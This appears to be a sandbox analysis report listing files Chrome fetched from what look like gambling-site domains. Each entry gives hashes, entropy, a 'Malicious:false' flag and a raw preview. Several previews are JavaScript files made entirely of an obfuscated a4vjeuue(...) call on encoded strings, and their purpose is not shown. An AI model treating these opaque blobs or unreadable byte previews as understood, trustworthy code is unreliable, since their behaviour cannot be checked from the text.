                                                                                                                                                          Preview:...........]{...u....aD..Y...O.0..[ 0......pv.q....VkA@..u.*Q.6Q..h.....e+..e4....|.K.{y.w.V%A........9....}..../..a..gg........9.........A8...\o.....F0O.Ep.L..x..z..r....`n......y|4...8..;........p......Z..N... 9...s.(^...x>J...Q.{.j>fI%.....9.5.....$..&.5..g.........E.Y..$=Z....9qz....k..7..p.L...Y..c..q..........G..S..u2A...5(....{..Z...!...mG."..$8$0j....8.g.p...z.....'I|.c..v....s...-.CX..k.v.I8...]........z..l?.....^..a.cM.4.v.$......(.g.pA..h.H...p..su+.D>.i8...1XC}Ll5.;Ia.S..~.[..=...7...<R..>..|m.x....N..N.W^yE..0&..8..4..Q.{.....(.Y{.....Tei.O....*....d!X..R....)g....s....P..Gv..u.$.l...cr..._'..n.N~.zp2.........&...s..5...c..arR8/}!...n.4.`K.:{*...xx}....1...\oc........{|4...).s.OG..O...Q&..d*?.v..\.yt....3.<.L.........|8..h._c...O.2......4.-F.w..........A.....>.p..z.(.m..moo..-G..'.Y.}.9LM.....g...._.C.x..Y...`.o...FU.x...(.~..n..U#.{..)..x..I...)}..m..y..y.<G..M..#I;..5..kP.......$`. ?.t.....W.V.a..q8..w..<}V.a)..w..D..S
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (712), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):712
                                                                                                                                                          Entropy (8bit):5.7135537403874475
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12:4chWLkcqH6+kssM9Uav0bZ8GfwvEYS3HWR7I2fawYJDtm4eVIBn3RjDOhWK6n:Vg+kssMONY6o7I2fNYJJbeVIXjqsK6
                                                                                                                                                          MD5:2D7B9CB7FBF56F77F8B2C24721633291
                                                                                                                                                          SHA1:E8EA8BFAB415047F9897153296F501E01C304435
                                                                                                                                                          SHA-256:FAC80021B6185550B1CFAB643DDF9E446CEBC274CCFBDC67BAEC5D89BCF38BED
                                                                                                                                                          SHA-512:94C7D56CFE02F1502FDD2336BE5393D9CD18D04036333F813C03ACB34CA3EF67380214E0B5CC81019C258F49C2EF39DA096615F14906AB5BBAFD68C9B20A3434
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-qq.gzjqwlkj.com/pc/240516-03/static/js/t3685-subNav-js.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAzATgBYBdAGgG8BlASwC8A3ALgDMBXNGAF2vUxFLSlOASnIAiVkhAACJJwBO1LmIDcAeTAArEFwB0AExDNqaEAAV5KCCHmcAnpkFiA+s5BIAsin2sANiDEKeihfVhBGAEIABgBfYSEDR1IxAFsQNFYAGWo5QLYObl5ReRBOVnk0aRg4hP0ksU4rAEkUgHM89i4eNExi0vLKlBrORKcwFE5GlJb20nyuovISsorpeTiVYPkqgF4l1sZyGAALRjFALHlADRVAC5tAGMVA9LOxGNIoMEOTs8BnRUA4uUBEI0AN3IPNBnN4oVicaSSZ6kGAoD6nMSAFQDAN8+gOBZzhaE4sEh0Je0ARZ0Ax3KAMBdAPLKgDrojFiTT0aRQVrpTgw/TyIliQBBmoBVeUAa8qAPmsaccUMBpI01joQNR6AEXsB9ByeYANbUFpEeYmFovFhggKCQ1BZBPeR0RgA49QCDkYA71MAGRk0uEpFLoaQQSxgfwpGHyJAcwDEsYBvuUAWsqAS30aWBStw0O0XvJfBzACORgEwlQCG5qr1YySiA0tiGWh9Gs/O4YRBqBzAAlpgEHPQD8poA1bxpLulsDszpQviUdhhIQ5gAgVQCkIWSaYEcWAACogAAenDOvcAnaaAeH0O+yTSTSXcBzEXigdmJAvIt88NkA===")
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (8744), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):8744
                                                                                                                                                          Entropy (8bit):5.932552425919391
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:VFygi0OSf6QzoU31aBkZ/720B21KzMpFEvtlAPNcSebQJhw25dB5Vt:VFygn6QzFgBkh7ZU1VUolcSe07HVl
                                                                                                                                                          MD5:829F0DF1F1036894C109D14213723407
                                                                                                                                                          SHA1:4BD0CECAB8B5CFF27AD12AD2F55961BDC2E67C1F
                                                                                                                                                          SHA-256:BE5099A447276D5C307D9EBB5C22472B55023D58C352D87E3D26DA75681BA0EF
                                                                                                                                                          SHA-512:EB03E1D1E1AF89C1ED54F45FC82C08926CCC59F0FAADB19B951C34AA8E6A3F82C2D52BC8CBCD159FFCABD1126E52C143F8C2596FC23390E442B4B98C1C3BF17B
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/240516-03/static/js/components/news.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtATADgE4BdAGgG8AhEAFwBkAuAMwFc0YaBLdTJUmgJTkAvqRiUAapWZsO3NL36k0QgEQskIAARIaAJ04dVAbgDyYAFYgOAOgAmIJpzQgACnpQQQemgE9MNKSqAPrBIEgAsih2LAA2IKoUAG5QsSwgDACEAAzCAsYpelogALwKqgC2SQASAIqqAqScZTYKII0oZZiqACJ2+MANpMAtCiiNel2q2ZyuABZDUKOYeo0wUz0sAPS4Q7FTAHIAmgAepkMsU9kwEExDEFNbSQDiACxDc8sQjXYlmMCYASYESkcxWDiYWI2CpQCARFg0KBcdBIIHkTQ0CJIADmDBgNmeeQoEE8LAgBxAwCQMnYyIUQk4TEwmWAzjsKGArUpSFcpO+5EKOhKNDmnCQXKpAEk0EwULyIGTjIzMNlMiVxfE0NiRUJBTQSuQKjiAMpzDlZbKkI3YgAqnBo8QYIrF0JxdodICtOMo0V8DD41oAwrEoEhqaoXFT5YkkGbgHRHDQKVS6GKaBbSCSFRAAGIh3GqI6qYTGVlodmcyM8vklHL8UXijFY7EBATCdukWMc5PU1i0+S8XVQIr67DEYzO8VV6Wy6GwzB9uQ8FTkPS0Fh6NBaNA2LNkvNQbEldUAMhPNF3GjmwK4HoYO9v8TE6BoIDQ6Z3MBfb8CumHNDtCoMh3P8fEAkAiVUYt8kFNADWtU1zTra13UdSdXVte0n2tH07D9X84wTJgk25VNdAzPdc3zf0S3QpscUwFRRAcL8HGqGgKliGklwUVEBWHLR9XZGAWCA98bBgNckRAABReIxJoboeklCQGmMNcaA3LcL2cFw9GqG0IjodV+BsV8ThoQNv3fAAfGydLQPSbRACzRBgWIUE0HtuLpQFyHQsVEJGTIAEZRGxWgexnFAfIHIciiQYUGyVJkAqQOgUGxZwzxYexHCgOILwAVS4KExUoEM0DgAIGxsDysrQ
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 30 x 30, 8-bit colormap, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1393
                                                                                                                                                          Entropy (8bit):5.850580915886296
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:4s/6Gtam7J1Vk2eJC28PKV29qfIoTZIUvy8+YK://60z12lJC28P5qf1NL+z
                                                                                                                                                          MD5:C2A6EA0A2A9A3B4B9C54322C373C42FB
                                                                                                                                                          SHA1:19BBDB7838AC217367995FB83B6EA104386426A0
                                                                                                                                                          SHA-256:26FADBA4DFF7DBBAAA384818540D4EB2EF2A5C6C90D006A0E47F3C021AC17BE2
                                                                                                                                                          SHA-512:A0AD3E8E8303A8F04F3672BAE41BF1A318AE0625F4821A79ABD64B0170C8649322C73072BA36BE9B31366AF888922E77383FC147020017719956625D5BDCF23D
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR...............^.....sRGB...,.....pHYs.................PLTE.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................|......tRNS......;n.....uJ.....dH=ATj/W....>.&9.+"3w..P<.Si...x...F.r:4.....^....f2......}Y ......ev..#.'..Q.5.mV....g\O.?.-.D]X..M..(.......)..h.%..|U..1.q@l....o.[L7./8...^IDATx.c`..`dbbf...............D.WPHXDTL\\BR.WT..Y.EFVN^A.n...4..,..*..j.....LZ.:b.z...piCey&&#c..c#S3s9.K+k9.[;.....5.-..]\L\M....5.<<... ..>J.~.......z.A.N......!..`iq{S..p..O.H.......8.x5..D.t...i@tTr0KJj`\Z.OzFf...C.'3..f...9...
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1x1, components 1
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):332
                                                                                                                                                          Entropy (8bit):6.8679847753890115
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6:dfNIOW/mfM8plt//kC7kmdViN0XxgRPWTTbOsvWGKkCHdcfmcGn1NMf/qLnDzofo:FC9YM8p//slJ0Xx0WzOsvWGKkCHdcfmx
                                                                                                                                                          MD5:BD9D76386CEE85AC4BE2F43FB3156A02
                                                                                                                                                          SHA1:D1BFC8928661CA2B2F71562EDC745419C582A88E
                                                                                                                                                          SHA-256:A26A53CFBFBF7CAE14898AC89EE39558CD9ED81D4E1D86FF2E5D17B6C185DC1F
                                                                                                                                                          SHA-512:7CDBE4BDD27C94FB93BE7DFFD3AB47BFA785FF578FB6EBFB5DEDA7527CA1122A76AAB1BBC900C02AA2E95686DC0B52CE95C9589721E89B771FBC7079C5057AD8
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://wssa-301.shiwanxin.com:1186/ocs/cc.png?1717972852371
                                                                                                                                                          Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342..................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz.................................................................................?.....
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 74 x 69, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):7640
                                                                                                                                                          Entropy (8bit):7.967133728246244
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:ypW+AGem0rQ9snxmITdQncXBbJRxHG8jHVNV:ypx9oQ9FBcRbJRDj1D
                                                                                                                                                          MD5:606B9BF626C97C6EB460C5D08D16209E
                                                                                                                                                          SHA1:CBE1913E4E23B62C5E8ACA8533971FD892D8195A
                                                                                                                                                          SHA-256:2C7494BD1407CE76AEB47314E5C7DA00C753DADDBE5323D652D62E626FA8E4D3
                                                                                                                                                          SHA-512:6CE822E6567A2FF284FF727EE079C0BA6734F1DA5A67F525878FB884281FDA6E44E40A8FA4922F3A60EF1D2CE595A1C8ED0EDD1211EF0BE5AD73709F67ACB66A
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR...J...E......p.....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD..............IDATx..{.eUu.{.}.}VUW7....@.:.G..M..D.....`...P#...6..'Q.O.1>..(b#.C^F%.HL$..I.!.. .~W.}...Z..9....h....w}vWw.....k..[..v;..M..M.........{...$z.........?..!.{`a.)....Z..(...Gq.5.k6. o.........9{.s.d.I.....F.O.......\c0.M`+.z4......_..e.,...=..a..U\...y.9....z.....L....G.I....4;...i...)FT....F ........o......B^..Q.+.o.D...n.l.............7."R.f...}....C>.....hZ....s..........0e.c........ys....Ci..Y...|..^H.A\..%...@9a.eG,..To8g.d?.F...c^..G.w....u..,.........o.r. .c......(....r..}..R..j.-.........a.....;...n..voP...{.V.Y.m..=:S|........o...:...U.....S.8.....~bb..z....c.u...hd..t]R.<..h<jS|..x.......4..GF..:.H........X..$p..N,..i....P&..o.r.G.5.?.@...q.S,....]..='.O..o.)_.4..!V@.A.P.x'N...1P..9pc.V^E....8..-,....]..6Z.$!K..B4._...8. U.M.....b.:...$A.....c...Z........yA.P.c!....u.>.E....2\...mF.PW.j..c....~j.V....0x..W.KQ.7.fB. *.p..
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 text
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):24
                                                                                                                                                          Entropy (8bit):4.1887218755408675
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:uuKln:uu4n
                                                                                                                                                          MD5:356555E64410CB07748C013C7862421C
                                                                                                                                                          SHA1:9FC2E0D7B2297CAB2DD4824D42BB20AF8CE1B6FE
                                                                                                                                                          SHA-256:9BF353A4E2B515DA809F62D31F61F5FD659AB8FFA04E1AC7A3304F2B05510748
                                                                                                                                                          SHA-512:0A14AE03555EBA744339B7632B8F5D382F60232499BC4D773D88DBDB7E3FAEAB7CC2815477EF59A68D500E648F977ECB68EA03D9DC9CB88FAD7201F2876D9A7C
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:....(empty-777).
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 31598
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):6253
                                                                                                                                                          Entropy (8bit):7.965593985492808
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:QSkfG167Bu5ZrwzirEAgpc3xYxKOE5SSFdvB4+KICQVbh0TAjA5LYzLyrGYr+D:Hk7E5SziriKC06gdvq+K7Qh0EcYCrH6D
                                                                                                                                                          MD5:E666CF1062741A4581B58C2AE792D7EB
                                                                                                                                                          SHA1:255167DC4785FC969942025F42003834B2F24B1C
                                                                                                                                                          SHA-256:765C303DF0B554CAD00EEA0223262C1A4C201218CC6109393C16A70C3D748B6E
                                                                                                                                                          SHA-512:61C830F7C1637EFD149F59F63E9C2F9A3D0EF5F52989327B6B9B6F6205976E6DAFC47594387392F366F75808E5D912254133E129FC26281AD2B02791E3CBB3D2
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://8vpfnx.eveday.me/ftl/commonPage/themes/gui-skin-default.css
                                                                                                                                                          Preview:...........=k...q..+.....n......>.G.rhK|X$e}.....qvf13.....I.+..p...# ..._....$.m.....O....L?j.{R.................g._...7...-w...'.n.....}.M.U.Y[.~../....W/~.......~......../?../..3VK.?EI...n9.!)8\e.8.Y.2..E..!k...4@..q.{.3.;m\w.Pq5...$^..q.Z.......'_..?...?Z......<7A....e..(."dO..{2>..l>r.s....~X......i6.,O..,...v.`.....h<...%v./G......zi...o.h(...EQ.%n..1mQ&@h. .Y...Z....e.....(A...O.Y^.i..B4...*]...<r$...V..w.;\ehLho;..1...?...G'.....Fq...0v..../... ....l..~..F}...M>..a.fv..b...8..gh...3t.qYS...{2K.U..^.b=ys:.rqQ.LRoz.....r..'..yk..C6 .<..]e..k...i..[s%........+....h...E..O~5..ap..j..Q....w.,....h.gs&.cFC.'.7.SM.d.z....w.?..y.!.+.G.}..K......0....#/N\.0t.xO.....\...c.+.N.j.4. ..r.b.v...A...;....VT.P'.(.........4XSlGQ.,..WA..).L.Y..n<.M..fS.;.;...i<.Z.....g.E...5u..m..U....H...?k.K..hfDQa..Z.>...6..P.#.kn...69..%..f.I.......z..Y.....'..+tbU..,^..bO.+:.b.........[.v[..t.&6..f.X9.....!G,,. s..*...."..1.p. @...../B..i..]`.B.....T.:.@6..e.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 231x135, components 3
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):15093
                                                                                                                                                          Entropy (8bit):7.9524351565226485
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:TpDmpvlG/p2S5debP9KQ3nlAd8LLf2aM77qh1HAdysV:TFA0p2i8A8aaM7eh6dyS
                                                                                                                                                          MD5:46C57C51B8DF1740D25BBABBAADA22A5
                                                                                                                                                          SHA1:AFC3B7126B10FF529F254D0445532E57DF189479
                                                                                                                                                          SHA-256:ABB838D5A5AF338C8A792C810C027E8723AC2499A2D5FD3A69E8FEA5AF5A7101
                                                                                                                                                          SHA-512:F5FD8851D65813989D798F464F50FDBC20B76470189CF7DF26CC3B1B983EC0486CE39C4BD108D315EA02ADE80E307B4133B20BA3E9D211F04C6BCBFF7EC657A2
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:......Exif..II*.................Ducky.......P......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:29498082-5ddd-3c4d-86ad-a7cbd10a716b" xmpMM:DocumentID="xmp.did:6D4B3F328D5911E7A155C2C7373E56B1" xmpMM:InstanceID="xmp.iid:6D4B3F318D5911E7A155C2C7373E56B1" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:82b9be3e-f922-d048-8196-e2c819558962" stRef:documentID="adobe:docid:photoshop:eddc2de5-6163-11e7-92d7-efec1b3bcc87"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...............................
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (2056), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):2056
                                                                                                                                                          Entropy (8bit):5.8388011130643065
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:Vstv7KD6GH33fXAeX9ENnJkTMn7QDVZVk1PWvrY:Vi0TH/DX9z4n7sjCPWvE
                                                                                                                                                          MD5:E2F2262AF0263C484C462CA095754BAF
                                                                                                                                                          SHA1:98DD870CDA75FEFA8AF6A90BD74BE542303871F7
                                                                                                                                                          SHA-256:76712A849134FAA240E227CBA1A28332089A5FD8C9C5672DD2CACEB00A1DA2E2
                                                                                                                                                          SHA-512:A05E3B576D4D75E1CCE7260B5E79BCF23ACE72823151EB6EE7CC1BBA93456FD19E251F92A1CE27A1D48640AD29C68065D0767539BC2A20660351A511BD743B23
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/240516-03/static/js/components/sportBet.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAjAZgHYBWAXQBoBvAIgCYAlALQBtqAuAMwFc0YAXAJbpMfciHICAlDS5IQAAiR8ATgP7UA3AHkwAKxD8AdABMQHAWhAAFZSgghlfAJ6Zx1APruQSALIpjXMwg1FQAblDMXCBsAIQADAC+khrhyvIoALwCmNQAIsYAHMDUkuRoWYZomCilSFk5uVwA9LQl5FD11AByAJoAHlptyp1xMBAcbQAWGZhVkpiUCeQ6+vyYUIYAtlAQAOIgfHwOSPPY1AJIADIoAOYWIedIACrKTlbMUE4PaCiCHF/kahISYoYAAZQgKEcACEDtRSKVKAIOMooJsAKrKZicHj8IRzSipeR8DKUPgoOAgNBsZQmMxQQJ8QzowTMQw3A4AYRQFIEIByTwpVLafEmIE20VFF0MovFICWIAyphg/hA6PoAEluZtIZY0HxMAASQzQVGbESSZLKA5cZRoYmTaUXABiUO2zGudzQAH5aaYOAzmEyWQI2Ry+AB1cB+AJBAASKCUmEkAGpqE1Nv5AiBDJM+JtmN7qCmQGmAMRNMBwthoQLMJYut0RT0WHG8QTCaTWvi2+1SpCGC4ttAAMhHMX7g+er3enwSSTKyYWSxWBgNG22EB8XD4UA7aBOCzkfDBIPBkJhBzYA4AGgvKMwUFBjNy0OYbm28Z3CVA0iT+xo2TULgACCug3CUOSGE0xbABYxigoYYIANIal0aZNPBIB9IYuhICUMpilU3DtvirjSESAgZO47IHK4gJIBefCwnwISLMkTKwIIoSKgIhhcQIPHkEysoStRtEGgIgKicE5C4JISTzoixh7lAn77smlDdr2lBigINx5mwcTtHiPGxLgwlihKbC4PO5AqjqO4gMYNZLosyx6Gu6xbDs+yHMcpyPMODwXC8bwfAC1A/H8kXAqCEJQsxcIIlQyJmpi2IkV+BJEiSZJCtSfr0oyzKshJ3K8vy1CCpSaAilZk
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):1823
                                                                                                                                                          Entropy (8bit):7.128143305251574
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:euinNuiVprKeJ3jt7IhEXtPxaRxngxTfKZhpTPr:2NoG7IhE9PEAM/T
                                                                                                                                                          MD5:29FFB1C72B8ABB2705B044AFD206B78F
                                                                                                                                                          SHA1:6409A4B4EBF0F3BFEC03B976629ECF0CAF17BB69
                                                                                                                                                          SHA-256:3C3D8821368D28F376C4CBC0009D73280331BCE3AAE3DD4B3E9819795188E67D
                                                                                                                                                          SHA-512:C9569BA594693AAF2D09B6E3110F4B978BA2C0A532FCB354C71E3ABF730BBF7D901E01B61490D45C5E26E5DD5890AD1263B16CF58580702D85B238507DA8CC87
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb1-hw.qectyoua.com/pc/image-pc/nav/icon-s/live_ag.png
                                                                                                                                                          Preview:.PNG........IHDR.............;0......tEXtSoftware.Adobe ImageReadyq.e<....iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c067 79.157747, 2015/03/30-23:40:42 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpRights="http://ns.adobe.com/xap/1.0/rights/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpRights:Marked="False" xmpMM:OriginalDocumentID="uuid:17BBB51BCE49E711A809823CCFAF5CCB" xmpMM:DocumentID="xmp.did:1B03F615F77811E79594A93B56FBC396" xmpMM:InstanceID="xmp.iid:1B03F614F77811E79594A93B56FBC396" xmp:CreatorTool="Adobe Photoshop CC (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:a581549a-d504-de42-880f-f1f6b1e4689b" stRef:documentID="adobe:docid:photoshop:fe692dff-f776-11e7-8e5d-cdd6397f58a0"/> </rdf:Description
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 54 x 54, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):2136
                                                                                                                                                          Entropy (8bit):7.481561404100871
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:tzvnK0tY0WSJ3ARUsliW2D28ZBJHyBcy1q8ewd6:ZK0q0WlUslK2o/Sm8pQ
                                                                                                                                                          MD5:1B6B6B1D513C84F744B82848FE630C69
                                                                                                                                                          SHA1:496BC8A65FFF75EE0DF64E30FFC40C066138FE0F
                                                                                                                                                          SHA-256:D4703C9CBA537A94010CA1DA3C028CBA45AB377F15DF9D333C91530A514E9311
                                                                                                                                                          SHA-512:4944D071CA703CC3AD6F35B219059687703ECC8896B5899BCB3D2413ECD6F05D9BF8FF55FC592F880EB0CC87D8014F5E8383C8335FC3CB06C13B8426C3ED361B
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR...6...6......Ej.....tEXtSoftware.Adobe ImageReadyq.e<...)iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c001 79.a8d475349, 2023/03/23-13:05:45 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:BB692B7421F511EE95B3B3F5D30ADB92" xmpMM:InstanceID="xmp.iid:BB692B7321F511EE95B3B3F5D30ADB92" xmp:CreatorTool="Adobe Photoshop CC 2015 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:2F24D629F3A111E7A495903E593B8715" stRef:documentID="xmp.did:2F24D62AF3A111E7A495903E593B8715"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.m?....IDATx..Z{..U.?3w..5....-....J.L.[B.RpAZ..E.?R...G.G..... .A.njbR...ZQ.....j..].mn.....w.x..s.9....?
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 230 x 129, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):51601
                                                                                                                                                          Entropy (8bit):7.989982708871979
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:RkTHJyR+I/EOhoB0ssIgslNYhElDr/NfGA42Sc2cyMyfzcTbq6wf4nCsoyi:RwpW+vOhe05s7Zr1fGALyfQH4wnkyi
                                                                                                                                                          MD5:C9C3302D6626018A1364C36C5B44A41F
                                                                                                                                                          SHA1:FDE1D597A3244D26CA9F2325DA88D3D9C691142C
                                                                                                                                                          SHA-256:F1BBD17C54B742DDBBF0CEDB24734135D140A847384582DDCC9905064721E7ED
                                                                                                                                                          SHA-512:AA9719435D984B0234E74C5528FFD375AD275C4A9E0DBDAF855691BADA071C7E61026A301E506578CD4803998DAC454CF47AACACBA36CCD20762D3687D3C4D23
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR...............Y....tEXtSoftware.Adobe ImageReadyq.e<...)iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c001 79.a8d475349, 2023/03/23-13:05:45 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:A0E2827A21F411EE92C293F42C87E92E" xmpMM:InstanceID="xmp.iid:A0E2827921F411EE92C293F42C87E92E" xmp:CreatorTool="Adobe Photoshop CC 2015 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:11701983F3A011E7890AE1B5CDF91674" stRef:documentID="xmp.did:11701984F3A011E7890AE1B5CDF91674"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.......IDATx..i.%Yv.v..o./......{....9...w....)z....-.0.....~..B.....l.... M..44.....{.kVU.o..{}.../..?
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1069x15, components 3
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):1236
                                                                                                                                                          Entropy (8bit):7.039150821841487
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:DljlmkfjQsknhskm1BLlTABOuacrWGQ/cR1lvo5o/0vChC8iMdkvkm/:aWjQskhskC3TARik1lvlMJEkvkM
                                                                                                                                                          MD5:50A4958C271523284693FE714F783911
                                                                                                                                                          SHA1:AD110518D0BC6F14287983F58B53E27F515FE72E
                                                                                                                                                          SHA-256:9F2107A55AB3343E65623CDF599E1E1C533CB38C5CCFFC7FF46D134BFB500044
                                                                                                                                                          SHA-512:A61FE9223B4A2F19796F189FFF542E071126CA297C01B5705E7E2AC7510C32314EC34604D22C53E9F40F12080229CC11D9548AC24FAEEC56E0D5B415674B5D7D
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/index/125/footer/line.jpeg
